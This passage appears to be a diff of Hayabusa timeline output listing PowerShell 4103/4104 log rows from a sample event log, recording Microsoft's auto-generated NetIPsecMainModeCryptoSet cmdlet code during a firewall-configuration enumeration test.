[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 